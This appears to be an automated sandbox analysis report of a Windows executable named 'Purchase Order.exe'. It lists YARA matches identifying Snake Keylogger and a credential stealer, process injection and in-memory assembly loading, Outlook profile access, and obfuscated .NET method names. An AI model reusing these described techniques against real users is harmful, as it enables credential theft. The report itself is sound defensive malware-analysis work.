Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dpapi.dll	Jump to behavior

Source: Purchase Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.Purchase Order.exe.378b300.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.Purchase Order.exe.37abb20.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Purchase Order.exe PID: 7192, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Purchase Order.exe PID: 7192, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Purchase Order.exe PID: 7692, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Purchase Order.exe PID: 7692, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: Purchase Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.Purchase Order.exe.378b300.9.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.Purchase Order.exe.37abb20.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, WOEeoXxWVHD4PPxwQc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, LeruYXEJgdh0317JJ5.cs	Security API names: _0020.SetAccessControl
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, LeruYXEJgdh0317JJ5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, LeruYXEJgdh0317JJ5.cs	Security API names: _0020.AddAccessRule
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, LeruYXEJgdh0317JJ5.cs	Security API names: _0020.SetAccessControl
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, LeruYXEJgdh0317JJ5.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, LeruYXEJgdh0317JJ5.cs	Security API names: _0020.AddAccessRule
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, WOEeoXxWVHD4PPxwQc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 3.2.Purchase Order.exe.25671d8.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 3.2.Purchase Order.exe.25213f8.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 3.2.Purchase Order.exe.25193e0.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/4

Source: C:\Users\user\Desktop\Purchase Order.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Mutant created: NULL

Source: Purchase Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Purchase Order.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Purchase Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Purchase Order.exe, 00000008.00000002.3809824015.0000000003FE1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000008.00000002.3808084232.00000000031C0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Purchase Order.exe	ReversingLabs: Detection: 31%
Source: Purchase Order.exe	Virustotal: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Purchase Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Purchase Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Purchase Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: FRZs.pdbSHA256 source: Purchase Order.exe
Source:	Binary string: FRZs.pdb source: Purchase Order.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: Purchase Order.exe, frmRestaurante.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 3.2.Purchase Order.exe.250808c.1.raw.unpack, nL.cs	.Net Code: sf
Source: 3.2.Purchase Order.exe.250808c.1.raw.unpack, nL.cs	.Net Code: wb System.Reflection.Assembly.Load(byte[])
Source: 3.2.Purchase Order.exe.50f0000.10.raw.unpack, nL.cs	.Net Code: sf
Source: 3.2.Purchase Order.exe.50f0000.10.raw.unpack, nL.cs	.Net Code: wb System.Reflection.Assembly.Load(byte[])
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, LeruYXEJgdh0317JJ5.cs	.Net Code: hIRu7GBKpypCkTuq8E2 System.Reflection.Assembly.Load(byte[])
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, LeruYXEJgdh0317JJ5.cs	.Net Code: hIRu7GBKpypCkTuq8E2 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06908E92 push E8FFFFFFh; iretd		3_2_06908E9D
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 8_2_01529770 push esp; ret		8_2_01529771

Source: Purchase Order.exe

Static PE information: section name: .text entropy: 7.98179362017261

Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, SPtGqGjWCJYyK8bNDm.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GdIwSeOyGI', 'HsFw1QfnI8', 'WXSwzZ56ey', 'tBj2issMGb', 'OiA2dvj5KO', 'sam2wf8Le9', 'uhM22cMmlQ', 'cinl1HBWyqMegBjtU0v'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, xjqib4fGgh2D4hcUnV.cs	High entropy of concatenated method names: 'mC3QuoC6E5', 'h0HQ9ux0cw', 'gYQQL4Jw98', 'tpqQVumxbn', 'iB8QX1fuyF', 'o6vQjHSfvt', 'Bh7Q5FuX7U', 'B8nQDj9Rh2', 'y2tQsK4X3F', 'owDQftpsEV'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, zmsPwd15mlK3sU8Y88.cs	High entropy of concatenated method names: 'vw6LKhUOA', 'nepV2oxx4', 'QAQjZnNup', 'Ky55Mtf1s', 'NRhsLjhl8', 'GIeflHwYB', 'U3jVhSAwcm9hfMiBv6', 'cq7QL2DQCSoUaRO2vw', 'VGI7PIZ5I', 'u0544eKCr'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, s1goaa8v8f7b4pYibK.cs	High entropy of concatenated method names: 'zAQNX9GXuO', 'i1yN5ASig2', 'VY4YaCX7F0', 'uvbYrDvmUk', 'F2FYWbwG7F', 'WI1YA50Tag', 'QcuYCDpFsd', 'OFuYRQNsOK', 'YOyYv0pFwO', 'LHFYHp0MlS'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, N9tjtmwqgQXn9TOSsR.cs	High entropy of concatenated method names: 'ToString', 'bPfUTptDy6', 'yOHU3Epn0S', 'UsCUaYZPfG', 'OajUrodRhp', 'v1gUWCVXmK', 'lEaUA6snZ0', 'goLUCVgwWb', 'bu8URPX8m2', 'RRyUvjtuFF'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, GdqOgLPsuiRnnFxbbFb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VMN4ZfE2f9', 'GDC4FVJGKX', 'VKI48mBnZU', 'KPY4OYV5U1', 'Fxj4liKIWp', 'MQD4meisGy', 'x6i4eAvAKq'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, h7wEcfFpN0g0i0ux4x.cs	High entropy of concatenated method names: 'PmR7BrLIGq', 'ULm7kq2vHF', 'IKS7YvQlhd', 'RYn7N7fZPr', 'Hi07EMXJDq', 'Xm47QBWVG0', 'wWk7gDWBd4', 'K007htAsYs', 'kx27IfSHod', 'n8r70ufXBI'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, Odifjlz3uKTsuoAcLW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IYepbVT2OF', 'U5Wpq0WwZ6', 'q46pUd7w9x', 'UGupcRKiU6', 'e5Mp7M15jq', 'nUJppygWE3', 'LbKp4MIkKF'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, qqNBolPHdfOcJ17he34.cs	High entropy of concatenated method names: 'sIQpuMuT5E', 'Bvvp9pFWLW', 'TPZpLwlAH8', 'OuUpVh9pt0', 'aNQpX2LQ1B', 'Ob1pjLQQlo', 'gVmp57eyo6', 'R4HpDons98', 'TwgpsiMlns', 'IPtpf18tpt'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, xYImOGNYJlADaHk6Ra.cs	High entropy of concatenated method names: 'eIccISdWsX', 'b9uc0xLwVQ', 'ToString', 'lK1cB2IqOG', 'lOucktC2GL', 'clScYxX6CQ', 'gXRcNsPlV2', 'a5JcEtSU9A', 'eTYcQFlWbJ', 'FZtcgLM8mU'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, vCdweLJf9FCMY7p7sY.cs	High entropy of concatenated method names: 'Dispose', 'AnfdSjnDKu', 'uRJw3HACTG', 'XTFJJMkR8j', 'Vdqd1I1cGa', 'D85dza6r4C', 'ProcessDialogKey', 'f58wito6LS', 'JtjwdRHR3v', 'ox2wwgVHwc'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, rbTIQFDs74rvLVtopd.cs	High entropy of concatenated method names: 'a5odQtGSFy', 'eiMdgPGEGL', 'MgKdIuX06d', 'OrRd0O7jve', 'DVfdquTE3t', 'MGHdUbWSFA', 'RdImPFJAgdNX5kGTEI', 'LDUZckS9vEbbIgYIT5', 'YgCddFfjBj', 'abdd292gXx'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, ISxtSLitdJyIZK0W8M.cs	High entropy of concatenated method names: 'pBNEKxaf7I', 'rSOEuXIQOG', 'AByELtwMN3', 'AUUEVa0vRG', 'mCTEj0tBKq', 'YiTE5ARojQ', 'VpvEsHxt8o', 'U0gEfTO29w', 'Dp9MbXWHGKBpJfH7Twg', 'mLEKevWK06frVFW6SS7'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, ytZKh3R2l1iHWImtrk.cs	High entropy of concatenated method names: 'WJKQBjdtgH', 'iZVQYAMSYx', 'u70QEK6Dhh', 'KtAE1ppFB6', 'F2mEzolS0M', 'nOKQihFeHC', 'MjwQdTU56W', 'wwSQwnle7d', 'eqwQ2BW0XX', 'AmuQ6CpeMZ'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, yF43FxXp2wRWkfKGm1.cs	High entropy of concatenated method names: 'WwSEGf0NrI', 'S9PEksxljU', 'LnEENBhyLc', 'Nc0EQ3xY9D', 'bsfEg944VM', 'GTUNlt66JV', 'eMrNmEJkVt', 'HvjNeth2kT', 'NlvNoQTRoZ', 'zKfNSrsdKT'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, TDwGx2eHAduadx63KE.cs	High entropy of concatenated method names: 'waepdNh4Yy', 'taVp2IGrty', 'd3pp61X1T2', 'YGJpBJpeWv', 'fKipkxWeRb', 'uglpNF7YVI', 'fTepEhZeC0', 'pDo7eG86bg', 'xGw7oVycMw', 'iQ37SKtM89'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, WOEeoXxWVHD4PPxwQc.cs	High entropy of concatenated method names: 'q3UkZyWBJb', 'JOYkFhJPI6', 'WQSk83LDLd', 'wKEkOFrrQS', 'zLjkl3eFrx', 'hO4kmhYOyg', 'VDFkevvZP2', 'Qurko7PYPT', 'OtCkS85gJE', 'N2vk1Ck6Ba'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, JhwlxM4bR2lxySGrNM.cs	High entropy of concatenated method names: 'EHTcoCvown', 'AVbc1gkRNy', 'g057iqG35G', 'rDI7dui7uO', 't3bcTTWhQD', 'bm3cMWvAwP', 'H1QcnWS0Rd', 'fZwcZ5849A', 'jWkcFVXfPg', 'zuxc8xolW6'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, LeruYXEJgdh0317JJ5.cs	High entropy of concatenated method names: 'arv2GXIM7r', 'OS22BPcwvo', 'MYS2k3Hkoq', 'brx2YNB8Q0', 'k5V2N8VDxw', 'do02EV76dO', 'u0M2QjmJvK', 'sal2gZLP8N', 'QEW2hpAAFa', 'lbS2Ig88uR'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, YmUQD00WVSemVelgiw.cs	High entropy of concatenated method names: 'DBHbDwOuIc', 'QrlbsNLME5', 'S4gbyP2cOp', 'xVSb3Dh5FZ', 'xTBbrQXWKs', 'AhXbWQsp9Z', 'dMqbCi3GOE', 'FDtbRFAZw3', 'ln4bHn96Ap', 'P5nbTfqXuW'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, hdDtTJAZUL6LTvg8kM.cs	High entropy of concatenated method names: 'hSMQE2WrCtTK3gRGlu2', 'h1eK38W9EHviPL4a5ZG', 'xIT7BKW4o0UJiYZH5et', 'DV3E7xgF0b', 'g9jEpwQLa9', 'LLeE4bBKgt', 'hMrbtpWYhfSMkV2guts', 'u7m4rGWVvCT8qfaTAoJ'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, CCatRHtdeEdpD35Ed5.cs	High entropy of concatenated method names: 'lYnYVo6NnV', 'HN8Yj2Dqhw', 'vepYDsL33o', 'DYhYs0tOu1', 'FjmYqZMSHo', 's6ZYUcquSO', 'MDOYclIbmH', 'EQYY7ElXZy', 'HsqYp29TBH', 'gTuY4dNQ48'
Source: 3.2.Purchase Order.exe.37f6810.8.raw.unpack, CKYUDtruqr7JNgjTSk.cs	High entropy of concatenated method names: 'j6J7yMjGxD', 'su973QbRxD', 'nAx7andOL2', 'MqY7rP8aJp', 'HBI7Z0KBa5', 'iMa7WIdFoy', 'Next', 'Next', 'Next', 'NextBytes'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, SPtGqGjWCJYyK8bNDm.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GdIwSeOyGI', 'HsFw1QfnI8', 'WXSwzZ56ey', 'tBj2issMGb', 'OiA2dvj5KO', 'sam2wf8Le9', 'uhM22cMmlQ', 'cinl1HBWyqMegBjtU0v'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, xjqib4fGgh2D4hcUnV.cs	High entropy of concatenated method names: 'mC3QuoC6E5', 'h0HQ9ux0cw', 'gYQQL4Jw98', 'tpqQVumxbn', 'iB8QX1fuyF', 'o6vQjHSfvt', 'Bh7Q5FuX7U', 'B8nQDj9Rh2', 'y2tQsK4X3F', 'owDQftpsEV'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, zmsPwd15mlK3sU8Y88.cs	High entropy of concatenated method names: 'vw6LKhUOA', 'nepV2oxx4', 'QAQjZnNup', 'Ky55Mtf1s', 'NRhsLjhl8', 'GIeflHwYB', 'U3jVhSAwcm9hfMiBv6', 'cq7QL2DQCSoUaRO2vw', 'VGI7PIZ5I', 'u0544eKCr'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, s1goaa8v8f7b4pYibK.cs	High entropy of concatenated method names: 'zAQNX9GXuO', 'i1yN5ASig2', 'VY4YaCX7F0', 'uvbYrDvmUk', 'F2FYWbwG7F', 'WI1YA50Tag', 'QcuYCDpFsd', 'OFuYRQNsOK', 'YOyYv0pFwO', 'LHFYHp0MlS'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, N9tjtmwqgQXn9TOSsR.cs	High entropy of concatenated method names: 'ToString', 'bPfUTptDy6', 'yOHU3Epn0S', 'UsCUaYZPfG', 'OajUrodRhp', 'v1gUWCVXmK', 'lEaUA6snZ0', 'goLUCVgwWb', 'bu8URPX8m2', 'RRyUvjtuFF'
Source: 3.2.Purchase Order.exe.8380000.12.raw.unpack, GdqOgLPsuiRnnFxbbFb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VMN4ZfE2f9', 'GDC4FVJGKX', 'VKI48mBnZU', 'KPY4OYV5U1', 'Fxj4liKIWp', 'MQD4meisGy', 'x6i4eAvAKq'
